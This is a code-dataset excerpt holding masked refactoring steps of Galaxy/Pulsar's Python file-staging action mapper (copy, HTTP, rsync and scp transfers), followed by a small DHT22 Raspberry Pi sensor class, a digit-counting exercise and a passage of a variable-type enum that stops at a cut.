match_type = 'path_type_only'\n\n def __init__(self, config):\n super().__init__(config)\n\n def _path_matches(self, path):\n return True\n\n def to_dict(self):\n return self._extend_base_dict()\n\n\nclass PrefixPathMapper(BasePathMapper):\n match_type = 'prefix'\n\n def __init__(self, config):\n super().__init__(config)\n self.prefix_path = abspath(config['path'])\n\n def _path_matches(self, path):\n return path is not None and path.startswith(self.prefix_path)\n\n def to_pattern(self):\n pattern_str = '({}{}[^\\\\s,\\\\\"\\\\\\']+)'.format(escape(self.\n prefix_path), escape(sep))\n return compile(pattern_str)\n\n def to_dict(self):\n return self._extend_base_dict(path=self.prefix_path)\n\n\nclass GlobPathMapper(BasePathMapper):\n match_type = 'glob'\n\n def __init__(self, config):\n super().__init__(config)\n self.glob_path = config['path']\n\n def _path_matches(self, path):\n return path is not None and fnmatch.fnmatch(path, self.glob_path)\n\n def to_pattern(self):\n return compile(fnmatch.translate(self.glob_path))\n\n def to_dict(self):\n return self._extend_base_dict(path=self.glob_path)\n\n\nclass RegexPathMapper(BasePathMapper):\n match_type = 'regex'\n\n def __init__(self, config):\n super().__init__(config)\n self.pattern_raw = config['path']\n self.pattern = compile(self.pattern_raw)\n\n def _path_matches(self, path):\n return path is not None and self.pattern.match(path) is not None\n\n def to_pattern(self):\n return self.pattern\n\n def to_dict(self):\n return self._extend_base_dict(path=self.pattern_raw)\n\n\n<mask token>\n\n\ndef _mappper_from_dict(mapper_dict):\n if 'path' in mapper_dict:\n map_type = mapper_dict.get('match_type', DEFAULT_PATH_MAPPER_TYPE)\n else:\n map_type = 'path_type_only'\n return MAPPER_CLASS_DICT[map_type](mapper_dict)\n\n\nclass FileLister:\n\n def __init__(self, config):\n self.depth = int(config.get('depth', '0'))\n\n def to_dict(self):\n return dict(depth=self.depth)\n\n def unstructured_map(self, path):\n depth = self.depth\n if self.depth == 0:\n return {path: basename(path)}\n else:\n while depth > 0:\n path = dirname(path)\n depth -= 1\n return {join(path, f): f for f in directory_files(path)}\n\n\n<mask token>\n", "step-5": "import fnmatch\nimport tempfile\nfrom contextlib import contextmanager\nfrom os import (\n makedirs,\n unlink,\n)\nfrom os.path import (\n abspath,\n basename,\n dirname,\n exists,\n join,\n sep,\n)\nfrom re import (\n compile,\n escape,\n)\nfrom typing import (\n Any,\n Dict,\n List,\n Type,\n)\nfrom urllib.parse import urlencode\n\nfrom galaxy.util.bunch import Bunch\n\nfrom .config_util import read_file\nfrom .transport import (\n get_file,\n post_file,\n rsync_get_file,\n rsync_post_file,\n scp_get_file,\n scp_post_file,\n)\nfrom .util import (\n copy_to_path,\n directory_files,\n unique_path_prefix,\n)\n\nDEFAULT_MAPPED_ACTION = 'transfer' # Not really clear to me what this should be, exception?\nDEFAULT_PATH_MAPPER_TYPE = 'prefix'\n\nSTAGING_ACTION_REMOTE = \"remote\"\nSTAGING_ACTION_LOCAL = \"local\"\nSTAGING_ACTION_NONE = None\nSTAGING_ACTION_DEFAULT = \"default\"\n\n# Poor man's enum.\npath_type = Bunch(\n # Galaxy input datasets and extra files.\n INPUT=\"input\",\n # Galaxy config and param files.\n CONFIG=\"config\",\n # Files from tool's tool_dir (for now just wrapper if available).\n TOOL=\"tool\",\n # Input tool work dir files - e.g. task-split input file\n WORKDIR=\"workdir\",\n # Job directory files (e.g. 
tool standard input/output and containerized command).\n JOBDIR=\"jobdir\",\n # Input metadata dir files - e.g. metadata files, etc..\n METADATA=\"metadata\",\n # Galaxy output datasets in their final home.\n OUTPUT=\"output\",\n # Galaxy from_work_dir output paths and other files (e.g. galaxy.json)\n OUTPUT_WORKDIR=\"output_workdir\",\n # Meta job and data files (e.g. Galaxy metadata generation files and\n # metric instrumentation files)\n OUTPUT_METADATA=\"output_metadata\",\n # Job directory files output.\n OUTPUT_JOBDIR=\"output_jobdir\",\n # Other fixed tool parameter paths (likely coming from tool data, but not\n # necessarily).\n UNSTRUCTURED=\"unstructured\",\n)\n\n\nACTION_DEFAULT_PATH_TYPES = [\n path_type.INPUT,\n path_type.CONFIG,\n path_type.TOOL,\n path_type.WORKDIR,\n path_type.JOBDIR,\n path_type.METADATA,\n path_type.OUTPUT,\n path_type.OUTPUT_WORKDIR,\n path_type.OUTPUT_METADATA,\n path_type.OUTPUT_JOBDIR,\n]\nALL_PATH_TYPES = ACTION_DEFAULT_PATH_TYPES + [path_type.UNSTRUCTURED]\n\nMISSING_FILES_ENDPOINT_ERROR = \"Attempted to use remote_transfer action without defining a files_endpoint.\"\nMISSING_SSH_KEY_ERROR = \"Attempt to use file transfer action requiring an SSH key without specifying a ssh_key.\"\n\n\nclass FileActionMapper:\n \"\"\"\n Objects of this class define how paths are mapped to actions.\n\n >>> json_string = r'''{\"paths\": [ \\\n {\"path\": \"/opt/galaxy\", \"action\": \"none\"}, \\\n {\"path\": \"/galaxy/data\", \"action\": \"transfer\"}, \\\n {\"path\": \"/cool/bamfiles/**/*.bam\", \"action\": \"copy\", \"match_type\": \"glob\"}, \\\n {\"path\": \".*/dataset_\\\\\\\\d+.dat\", \"action\": \"copy\", \"match_type\": \"regex\"} \\\n ]}'''\n >>> from tempfile import NamedTemporaryFile\n >>> from os import unlink\n >>> def mapper_for(default_action, config_contents):\n ... f = NamedTemporaryFile(delete=False)\n ... f.write(config_contents.encode('UTF-8'))\n ... f.close()\n ... mock_client = Bunch(default_file_action=default_action, action_config_path=f.name, files_endpoint=None)\n ... mapper = FileActionMapper(mock_client)\n ... as_dict = config=mapper.to_dict()\n ... mapper = FileActionMapper(config=as_dict) # Serialize and deserialize it to make sure still works\n ... unlink(f.name)\n ... 
return mapper\n >>> mapper = mapper_for(default_action='none', config_contents=json_string)\n >>> # Test first config line above, implicit path prefix mapper\n >>> action = mapper.action({'path': '/opt/galaxy/tools/filters/catWrapper.py'}, 'input')\n >>> action.action_type == u'none'\n True\n >>> action.staging_needed\n False\n >>> # Test another (2nd) mapper, this one with a different action\n >>> action = mapper.action({'path': '/galaxy/data/files/000/dataset_1.dat'}, 'input')\n >>> action.action_type == u'transfer'\n True\n >>> action.staging_needed\n True\n >>> # Always at least copy work_dir outputs.\n >>> action = mapper.action({'path': '/opt/galaxy/database/working_directory/45.sh'}, 'workdir')\n >>> action.action_type == u'copy'\n True\n >>> action.staging_needed\n True\n >>> # Test glob mapper (matching test)\n >>> mapper.action({'path': '/cool/bamfiles/projectABC/study1/patient3.bam'}, 'input').action_type == u'copy'\n True\n >>> # Test glob mapper (non-matching test)\n >>> mapper.action({'path': '/cool/bamfiles/projectABC/study1/patient3.bam.bai'}, 'input').action_type == u'none'\n True\n >>> # Regex mapper test.\n >>> mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'input').action_type == u'copy'\n True\n >>> # Doesn't map unstructured paths by default\n >>> mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'unstructured').action_type == u'none'\n True\n >>> input_only_mapper = mapper_for(default_action=\"none\", config_contents=r'''{\"paths\": [ \\\n {\"path\": \"/\", \"action\": \"transfer\", \"path_types\": \"input\"} \\\n ] }''')\n >>> input_only_mapper.action({'path': '/dataset_1.dat'}, 'input').action_type == u'transfer'\n True\n >>> input_only_mapper.action({'path': '/dataset_1.dat'}, 'output').action_type == u'none'\n True\n >>> unstructured_mapper = mapper_for(default_action=\"none\", config_contents=r'''{\"paths\": [ \\\n {\"path\": \"/\", \"action\": \"transfer\", \"path_types\": \"*any*\"} \\\n ] }''')\n >>> unstructured_mapper.action({'path': '/old/galaxy/data/dataset_10245.dat'}, 'unstructured').action_type == u'transfer'\n True\n >>> match_type_only_mapper = mapper_for(default_action=\"none\", config_contents=r'''{\"paths\": [ \\\n {\"action\": \"transfer\", \"path_types\": \"input\"}, \\\n {\"action\": \"remote_copy\", \"path_types\": \"output\"} \\\n ] }''')\n >>> input_action = match_type_only_mapper.action({}, 'input')\n >>> input_action.action_type\n 'transfer'\n >>> output_action = match_type_only_mapper.action({}, 'output')\n >>> output_action.action_type\n 'remote_copy'\n \"\"\"\n\n def __init__(self, client=None, config=None):\n if config is None and client is None:\n message = \"FileActionMapper must be constructed from either a client or a config dictionary.\"\n raise Exception(message)\n if config is None:\n config = self.__client_to_config(client)\n self.default_action = config.get(\"default_action\", \"transfer\")\n self.ssh_key = config.get(\"ssh_key\", None)\n self.ssh_user = config.get(\"ssh_user\", None)\n self.ssh_host = config.get(\"ssh_host\", None)\n self.ssh_port = config.get(\"ssh_port\", None)\n self.mappers = mappers_from_dicts(config.get(\"paths\", []))\n self.files_endpoint = config.get(\"files_endpoint\", None)\n\n def action(self, source, type, mapper=None):\n path = source.get(\"path\", None)\n mapper = self.__find_mapper(path, type, mapper)\n action_class = self.__action_class(path, type, mapper)\n file_lister = DEFAULT_FILE_LISTER\n action_kwds = {}\n if mapper:\n file_lister = mapper.file_lister\n 
action_kwds = mapper.action_kwds\n action = action_class(source, file_lister=file_lister, **action_kwds)\n self.__process_action(action, type)\n return action\n\n def unstructured_mappers(self):\n \"\"\" Return mappers that will map 'unstructured' files (i.e. go beyond\n mapping inputs, outputs, and config files).\n \"\"\"\n return filter(lambda m: path_type.UNSTRUCTURED in m.path_types, self.mappers)\n\n def to_dict(self):\n return dict(\n default_action=self.default_action,\n files_endpoint=self.files_endpoint,\n ssh_key=self.ssh_key,\n ssh_user=self.ssh_user,\n ssh_port=self.ssh_port,\n ssh_host=self.ssh_host,\n paths=list(map(lambda m: m.to_dict(), self.mappers))\n )\n\n def __client_to_config(self, client):\n action_config_path = client.action_config_path\n if action_config_path:\n config = read_file(action_config_path)\n else:\n config = getattr(client, \"file_actions\", {})\n config[\"default_action\"] = client.default_file_action\n config[\"files_endpoint\"] = client.files_endpoint\n for attr in ['ssh_key', 'ssh_user', 'ssh_port', 'ssh_host']:\n if hasattr(client, attr):\n config[attr] = getattr(client, attr)\n return config\n\n def __find_mapper(self, path, type, mapper=None):\n if not mapper:\n if path is not None:\n normalized_path = abspath(path)\n else:\n normalized_path = None\n for query_mapper in self.mappers:\n if query_mapper.matches(normalized_path, type):\n mapper = query_mapper\n break\n return mapper\n\n def __action_class(self, path, type, mapper):\n action_type = self.default_action if type in ACTION_DEFAULT_PATH_TYPES else \"none\"\n if mapper:\n action_type = mapper.action_type\n if type in [\"workdir\", \"jobdir\", \"output_workdir\", \"output_metadata\", \"output_jobdir\"] and action_type == \"none\":\n # We are changing the working_directory/job_directory relative to what\n # Galaxy would use, these need to be copied over.\n action_type = \"copy\"\n action_class = actions.get(action_type, None)\n if action_class is None:\n message_template = \"Unknown action_type encountered %s while trying to map path %s\"\n message_args = (action_type, path)\n raise Exception(message_template % message_args)\n return action_class\n\n def __process_action(self, action, file_type):\n \"\"\" Extension point to populate extra action information after an\n action has been created.\n \"\"\"\n if getattr(action, \"inject_url\", False):\n self.__inject_url(action, file_type)\n if getattr(action, \"inject_ssh_properties\", False):\n self.__inject_ssh_properties(action)\n\n def __inject_url(self, action, file_type):\n url_base = self.files_endpoint\n if not url_base:\n raise Exception(MISSING_FILES_ENDPOINT_ERROR)\n if \"?\" not in url_base:\n url_base = \"%s?\" % url_base\n else:\n url_base = \"%s&\" % url_base\n url_params = urlencode({\"path\": action.path, \"file_type\": file_type})\n action.url = f\"{url_base}{url_params}\"\n\n def __inject_ssh_properties(self, action):\n for attr in [\"ssh_key\", \"ssh_host\", \"ssh_port\", \"ssh_user\"]:\n action_attr = getattr(action, attr)\n if action_attr == UNSET_ACTION_KWD:\n client_default_attr = getattr(self, attr, None)\n setattr(action, attr, client_default_attr)\n\n if action.ssh_key is None:\n raise Exception(MISSING_SSH_KEY_ERROR)\n\n\nREQUIRED_ACTION_KWD = object()\nUNSET_ACTION_KWD = \"__UNSET__\"\n\n\nclass BaseAction:\n whole_directory_transfer_supported = False\n action_spec: Dict[str, Any] = {}\n action_type: str\n\n def __init__(self, source, file_lister=None):\n self.source = source\n self.file_lister = file_lister or 
DEFAULT_FILE_LISTER\n\n @property\n def path(self):\n return self.source.get(\"path\")\n\n def unstructured_map(self, path_helper):\n unstructured_map = self.file_lister.unstructured_map(self.path)\n if self.staging_needed:\n # To ensure uniqueness, prepend unique prefix to each name\n prefix = unique_path_prefix(self.path)\n for path, name in unstructured_map.items():\n unstructured_map[path] = join(prefix, name)\n else:\n path_rewrites = {}\n for path in unstructured_map:\n rewrite = self.path_rewrite(path_helper, path)\n if rewrite:\n path_rewrites[path] = rewrite\n unstructured_map = path_rewrites\n return unstructured_map\n\n @property\n def staging_needed(self):\n return self.staging != STAGING_ACTION_NONE\n\n @property\n def staging_action_local(self):\n return self.staging == STAGING_ACTION_LOCAL\n\n def _extend_base_dict(self, **kwds):\n base_dict = dict(\n path=self.path, # For older Pulsar servers (pre-0.13.0?)\n source=self.source,\n action_type=self.action_type,\n )\n base_dict.update(**kwds)\n return base_dict\n\n def to_dict(self):\n return self._extend_base_dict()\n\n def __str__(self):\n as_dict = self.to_dict()\n attribute_str = \"\"\n first = True\n for key, value in as_dict.items():\n if key == \"source\":\n continue\n if first:\n first = False\n else:\n attribute_str += \",\"\n attribute_str += \"{}={}\".format(key, value)\n return \"FileAction[%s]\" % attribute_str\n\n\nclass NoneAction(BaseAction):\n \"\"\" This action indicates the corresponding path does not require any\n additional action. This should indicate paths that are available both on\n the Pulsar client (i.e. Galaxy server) and remote Pulsar server with the same\n paths. \"\"\"\n action_type = \"none\"\n staging = STAGING_ACTION_NONE\n\n def to_dict(self):\n return self._extend_base_dict()\n\n @classmethod\n def from_dict(cls, action_dict):\n return NoneAction(source=action_dict[\"source\"])\n\n def path_rewrite(self, path_helper, path=None):\n return None\n\n\nclass RewriteAction(BaseAction):\n \"\"\" This actin indicates the Pulsar server should simply rewrite the path\n to the specified file.\n \"\"\"\n action_spec = dict(\n source_directory=REQUIRED_ACTION_KWD,\n destination_directory=REQUIRED_ACTION_KWD\n )\n action_type = \"rewrite\"\n staging = STAGING_ACTION_NONE\n\n def __init__(self, source, file_lister=None, source_directory=None, destination_directory=None):\n super().__init__(source, file_lister=file_lister)\n self.source_directory = source_directory\n self.destination_directory = destination_directory\n\n def to_dict(self):\n return self._extend_base_dict(\n source_directory=self.source_directory,\n destination_directory=self.destination_directory,\n )\n\n @classmethod\n def from_dict(cls, action_dict):\n return RewriteAction(\n source=action_dict[\"source\"],\n source_directory=action_dict[\"source_directory\"],\n destination_directory=action_dict[\"destination_directory\"],\n )\n\n def path_rewrite(self, path_helper, path=None):\n if not path:\n path = self.path\n new_path = path_helper.from_posix_with_new_base(self.path, self.source_directory, self.destination_directory)\n return None if new_path == self.path else new_path\n\n\nclass TransferAction(BaseAction):\n \"\"\" This actions indicates that the Pulsar client should initiate an HTTP\n transfer of the corresponding path to the remote Pulsar server before\n launching the job. 
\"\"\"\n action_type = \"transfer\"\n staging = STAGING_ACTION_LOCAL\n\n\nclass CopyAction(BaseAction):\n \"\"\" This action indicates that the Pulsar client should execute a file system\n copy of the corresponding path to the Pulsar staging directory prior to\n launching the corresponding job. \"\"\"\n action_type = \"copy\"\n staging = STAGING_ACTION_LOCAL\n\n\nclass RemoteCopyAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should copy the file before\n execution via direct file system copy. This is like a CopyAction, but\n it indicates the action should occur on the Pulsar server instead of on\n the client.\n \"\"\"\n action_type = \"remote_copy\"\n staging = STAGING_ACTION_REMOTE\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteCopyAction(source=action_dict[\"source\"])\n\n def write_to_path(self, path):\n copy_to_path(open(self.path, \"rb\"), path)\n\n def write_from_path(self, pulsar_path):\n destination = self.path\n parent_directory = dirname(destination)\n if not exists(parent_directory):\n makedirs(parent_directory)\n with open(pulsar_path, \"rb\") as f:\n copy_to_path(f, destination)\n\n\nclass RemoteTransferAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should transfer the file before\n execution via one of the remote transfer implementations. This is like a TransferAction, but\n it indicates the action requires network access to the staging server, and\n should be executed via ssh/rsync/etc\n \"\"\"\n inject_url = True\n action_type = \"remote_transfer\"\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, url=None):\n super().__init__(source, file_lister=file_lister)\n self.url = url\n\n def to_dict(self):\n return self._extend_base_dict(url=self.url)\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteTransferAction(source=action_dict[\"source\"], url=action_dict[\"url\"])\n\n def write_to_path(self, path):\n get_file(self.url, path)\n\n def write_from_path(self, pulsar_path):\n post_file(self.url, pulsar_path)\n\n\nclass RemoteObjectStoreCopyAction(BaseAction):\n \"\"\"\n \"\"\"\n action_type = \"remote_object_store_copy\"\n staging = STAGING_ACTION_REMOTE\n inject_object_store = True\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteObjectStoreCopyAction(source=action_dict[\"source\"])\n\n def write_to_path(self, path):\n assert self.object_store # Make sure object_store attribute injected\n assert \"object_store_ref\" in self.source\n object_store_ref = self.source[\"object_store_ref\"]\n dataset_object = Bunch(\n id=object_store_ref[\"dataset_id\"],\n uuid=object_store_ref[\"dataset_uuid\"],\n object_store_id=object_store_ref[\"object_store_id\"],\n )\n filename = self.object_store.get_filename(dataset_object)\n copy_to_path(open(filename, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n raise NotImplementedError(\"Writing raw files to object store not supported at this time.\")\n\n\nclass PubkeyAuthenticatedTransferAction(BaseAction):\n \"\"\"Base class for file transfers requiring an SSH public/private key\n \"\"\"\n inject_ssh_properties = True\n action_spec = dict(\n ssh_key=UNSET_ACTION_KWD,\n ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD,\n ssh_port=UNSET_ACTION_KWD,\n )\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD, ssh_key=UNSET_ACTION_KWD):\n super().__init__(source, file_lister=file_lister)\n 
self.ssh_user = ssh_user\n self.ssh_host = ssh_host\n self.ssh_port = ssh_port\n self.ssh_key = ssh_key\n\n def to_dict(self):\n return self._extend_base_dict(\n ssh_user=self.ssh_user,\n ssh_host=self.ssh_host,\n ssh_port=self.ssh_port\n )\n\n @contextmanager\n def _serialized_key(self):\n key_file = self.__serialize_ssh_key()\n yield key_file\n self.__cleanup_ssh_key(key_file)\n\n def __serialize_ssh_key(self):\n f = tempfile.NamedTemporaryFile(delete=False)\n if self.ssh_key is not None:\n f.write(self.ssh_key.encode(\"utf-8\"))\n else:\n raise Exception(\"SSH_KEY not available\")\n return f.name\n\n def __cleanup_ssh_key(self, keyfile):\n if exists(keyfile):\n unlink(keyfile)\n\n\nclass RsyncTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = \"remote_rsync_transfer\"\n\n @classmethod\n def from_dict(cls, action_dict):\n return RsyncTransferAction(source=action_dict[\"source\"],\n ssh_user=action_dict[\"ssh_user\"],\n ssh_host=action_dict[\"ssh_host\"],\n ssh_port=action_dict[\"ssh_port\"],\n ssh_key=action_dict[\"ssh_key\"])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n rsync_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n rsync_post_file(pulsar_path, self.path, self.ssh_user,\n self.ssh_host, self.ssh_port, key_file)\n\n\nclass ScpTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = \"remote_scp_transfer\"\n\n @classmethod\n def from_dict(cls, action_dict):\n return ScpTransferAction(source=action_dict[\"source\"],\n ssh_user=action_dict[\"ssh_user\"],\n ssh_host=action_dict[\"ssh_host\"],\n ssh_port=action_dict[\"ssh_port\"],\n ssh_key=action_dict[\"ssh_key\"])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n scp_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n scp_post_file(pulsar_path, self.path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n\nclass MessageAction:\n \"\"\" Sort of pseudo action describing \"files\" store in memory and\n transferred via message (HTTP, Python-call, MQ, etc...)\n \"\"\"\n action_type = \"message\"\n staging = STAGING_ACTION_DEFAULT\n\n def __init__(self, contents, client=None):\n self.contents = contents\n self.client = client\n\n @property\n def staging_needed(self):\n return True\n\n @property\n def staging_action_local(self):\n # Ekkk, cannot be called if created through from_dict.\n # Shouldn't be a problem the way it is used - but is an\n # object design problem.\n return self.client.prefer_local_staging\n\n def to_dict(self):\n return dict(contents=self.contents, action_type=MessageAction.action_type)\n\n @classmethod\n def from_dict(cls, action_dict):\n return MessageAction(contents=action_dict[\"contents\"])\n\n def write_to_path(self, path):\n open(path, \"w\").write(self.contents)\n\n\nDICTIFIABLE_ACTION_CLASSES = [\n RemoteCopyAction,\n RemoteTransferAction,\n MessageAction,\n RsyncTransferAction,\n ScpTransferAction,\n RemoteObjectStoreCopyAction\n]\n\n\ndef from_dict(action_dict):\n action_type = action_dict.get(\"action_type\", None)\n target_class = None\n for action_class in DICTIFIABLE_ACTION_CLASSES:\n if action_type == action_class.action_type:\n target_class = action_class\n if not target_class:\n message = \"Failed to recover action from dictionary - invalid action type specified 
%s.\" % action_type\n raise Exception(message)\n if \"source\" in action_dict:\n action_dict.pop(\"path\") # remove redundant information stored for backward compatibility.\n elif \"path\" in action_dict:\n # legacy message received from older Pulsar client, pop the path from the dict\n # and convert it to a source.\n source = {\"path\": action_dict.pop(\"path\")}\n action_dict[\"source\"] = source\n return target_class.from_dict(action_dict)\n\n\nclass BasePathMapper:\n match_type: str\n\n def __init__(self, config):\n action_type = config.get('action', DEFAULT_MAPPED_ACTION)\n action_class = actions.get(action_type, None)\n action_kwds = action_class.action_spec.copy()\n for key, value in action_kwds.items():\n if key in config:\n action_kwds[key] = config[key]\n elif value is REQUIRED_ACTION_KWD:\n message_template = \"action_type %s requires key word argument %s\"\n message = message_template % (action_type, key)\n raise Exception(message)\n else:\n action_kwds[key] = value\n self.action_type = action_type\n self.action_kwds = action_kwds\n path_types_str = config.get('path_types', \"*defaults*\")\n path_types_str = path_types_str.replace(\"*defaults*\", \",\".join(ACTION_DEFAULT_PATH_TYPES))\n path_types_str = path_types_str.replace(\"*any*\", \",\".join(ALL_PATH_TYPES))\n self.path_types = path_types_str.split(\",\")\n self.file_lister = FileLister(config)\n\n def matches(self, path, path_type):\n path_type_matches = path_type in self.path_types\n rval = path_type_matches and self._path_matches(path)\n return rval\n\n def _extend_base_dict(self, **kwds):\n base_dict = dict(\n action=self.action_type,\n path_types=\",\".join(self.path_types),\n match_type=self.match_type\n )\n base_dict.update(self.file_lister.to_dict())\n base_dict.update(self.action_kwds)\n base_dict.update(**kwds)\n return base_dict\n\n def to_pattern(self):\n raise NotImplementedError()\n\n\nclass PathTypeOnlyMapper(BasePathMapper):\n match_type = 'path_type_only'\n\n def __init__(self, config):\n super().__init__(config)\n\n def _path_matches(self, path):\n return True\n\n def to_dict(self):\n return self._extend_base_dict()\n\n\nclass PrefixPathMapper(BasePathMapper):\n match_type = 'prefix'\n\n def __init__(self, config):\n super().__init__(config)\n self.prefix_path = abspath(config['path'])\n\n def _path_matches(self, path):\n return path is not None and path.startswith(self.prefix_path)\n\n def to_pattern(self):\n pattern_str = r\"({}{}[^\\s,\\\"\\']+)\".format(escape(self.prefix_path), escape(sep))\n return compile(pattern_str)\n\n def to_dict(self):\n return self._extend_base_dict(path=self.prefix_path)\n\n\nclass GlobPathMapper(BasePathMapper):\n match_type = 'glob'\n\n def __init__(self, config):\n super().__init__(config)\n self.glob_path = config['path']\n\n def _path_matches(self, path):\n return path is not None and fnmatch.fnmatch(path, self.glob_path)\n\n def to_pattern(self):\n return compile(fnmatch.translate(self.glob_path))\n\n def to_dict(self):\n return self._extend_base_dict(path=self.glob_path)\n\n\nclass RegexPathMapper(BasePathMapper):\n match_type = 'regex'\n\n def __init__(self, config):\n super().__init__(config)\n self.pattern_raw = config['path']\n self.pattern = compile(self.pattern_raw)\n\n def _path_matches(self, path):\n return path is not None and self.pattern.match(path) is not None\n\n def to_pattern(self):\n return self.pattern\n\n def to_dict(self):\n return self._extend_base_dict(path=self.pattern_raw)\n\n\nMAPPER_CLASSES = [PathTypeOnlyMapper, PrefixPathMapper, 
GlobPathMapper, RegexPathMapper]\nMAPPER_CLASS_DICT = dict(map(lambda c: (c.match_type, c), MAPPER_CLASSES))\n\n\ndef mappers_from_dicts(mapper_def_list):\n return list(map(lambda m: _mappper_from_dict(m), mapper_def_list))\n\n\ndef _mappper_from_dict(mapper_dict):\n if \"path\" in mapper_dict:\n map_type = mapper_dict.get('match_type', DEFAULT_PATH_MAPPER_TYPE)\n else:\n map_type = 'path_type_only'\n return MAPPER_CLASS_DICT[map_type](mapper_dict)\n\n\nclass FileLister:\n\n def __init__(self, config):\n self.depth = int(config.get(\"depth\", \"0\"))\n\n def to_dict(self):\n return dict(\n depth=self.depth\n )\n\n def unstructured_map(self, path):\n depth = self.depth\n if self.depth == 0:\n return {path: basename(path)}\n else:\n while depth > 0:\n path = dirname(path)\n depth -= 1\n return {join(path, f): f for f in directory_files(path)}\n\n\nDEFAULT_FILE_LISTER = FileLister(dict(depth=0))\n\nACTION_CLASSES: List[Type[BaseAction]] = [\n NoneAction,\n RewriteAction,\n TransferAction,\n CopyAction,\n RemoteCopyAction,\n RemoteTransferAction,\n RemoteObjectStoreCopyAction,\n RsyncTransferAction,\n ScpTransferAction,\n]\nactions = {clazz.action_type: clazz for clazz in ACTION_CLASSES}\n\n\n__all__ = (\n 'FileActionMapper',\n 'path_type',\n 'from_dict',\n 'MessageAction',\n 'RemoteTransferAction', # For testing\n)\n", "step-ids": [ 84, 86, 97, 122, 127 ] }
[ 84, 86, 97, 122, 127 ]
import time
import DHT22
import pigpio
import Sensor

class MagicBoxDHT22(object):

    def DHT22(self):
        self.s.trigger()
        time.sleep(0.2)
        self.tempF=round(self.s.temperature()*1.8+32,2) -3.7 #+adjustment
        self.humidity=round(self.s.humidity())

    def __init__(self):
        self.pi=pigpio.pi()
        self.s=DHT22.sensor(self.pi, 4)
        self.tempF=0
        self.humidity=0
normal
{ "blob_id": "179b07870d656fb24b73d8b0a1f76ffed08aa5c2", "index": 9665, "step-1": "<mask token>\n\n\nclass MagicBoxDHT22(object):\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass MagicBoxDHT22(object):\n <mask token>\n\n def __init__(self):\n self.pi = pigpio.pi()\n self.s = DHT22.sensor(self.pi, 4)\n self.tempF = 0\n self.humidity = 0\n", "step-3": "<mask token>\n\n\nclass MagicBoxDHT22(object):\n\n def DHT22(self):\n self.s.trigger()\n time.sleep(0.2)\n self.tempF = round(self.s.temperature() * 1.8 + 32, 2) - 3.7\n self.humidity = round(self.s.humidity())\n\n def __init__(self):\n self.pi = pigpio.pi()\n self.s = DHT22.sensor(self.pi, 4)\n self.tempF = 0\n self.humidity = 0\n", "step-4": "import time\nimport DHT22\nimport pigpio\nimport Sensor\n\n\nclass MagicBoxDHT22(object):\n\n def DHT22(self):\n self.s.trigger()\n time.sleep(0.2)\n self.tempF = round(self.s.temperature() * 1.8 + 32, 2) - 3.7\n self.humidity = round(self.s.humidity())\n\n def __init__(self):\n self.pi = pigpio.pi()\n self.s = DHT22.sensor(self.pi, 4)\n self.tempF = 0\n self.humidity = 0\n", "step-5": "import time\nimport DHT22\nimport pigpio\nimport Sensor\n\nclass MagicBoxDHT22(object):\n\n def DHT22(self):\n self.s.trigger()\n time.sleep(0.2)\n self.tempF=round(self.s.temperature()*1.8+32,2) -3.7 #+adjustment\n self.humidity=round(self.s.humidity())\n\n def __init__(self):\n self.pi=pigpio.pi()\n self.s=DHT22.sensor(self.pi, 4)\n self.tempF=0\n self.humidity=0\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
A = int(input())
B = int(input())
C = int(input())
number = A * B * C
num = str(number)
for i in range(10): # 9를 입력해서 첨에 틀림 !
    count = 0
    for j in range(len(num)):
        if i == int(num[j]):
            count += 1
        else:
            continue
    print(count)
normal
{ "blob_id": "b43ea8c32207bf43abc3b9b490688fde0706d876", "index": 4633, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in range(10):\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n", "step-3": "A = int(input())\nB = int(input())\nC = int(input())\nnumber = A * B * C\nnum = str(number)\nfor i in range(10):\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n", "step-4": "A = int(input())\nB = int(input())\nC = int(input())\nnumber = A * B * C\nnum = str(number)\nfor i in range(10): # 9를 입력해서 첨에 틀림 !\n count = 0\n for j in range(len(num)):\n if i == int(num[j]):\n count += 1\n else:\n continue\n print(count)\n ", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from enum import Enum


class VariableType(Enum):
    uint8 = "uint8",
    int8 = "int8"

    uint16 = "uint16"
    int16 = "int16"

    uint32 = "uint32"
    int32 = "int32"

    float = "float"
    double = "double"
    bool = "bool"

    custom = "custom"


class Variable:
    def __init__(self, type_str: str, name: str):
        self.original_type = type_str
        self.__map_variable_type(type_str)
        self.name = name

    def __str__(self):
        return "VariableDto name=" + self.name + " type=" + str(self.type.name)

    def __map_variable_type(self, variable_type):
        # TODO add support for short, int, etc.
        switcher = {
            "uint8_t": (VariableType.uint8, 1),
            "int8_t": (VariableType.int8, 1),
            "uint16_t": (VariableType.uint16, 2),
            "int16_t": (VariableType.int16, 2),
            "uint32_t": (VariableType.uint32, 4),
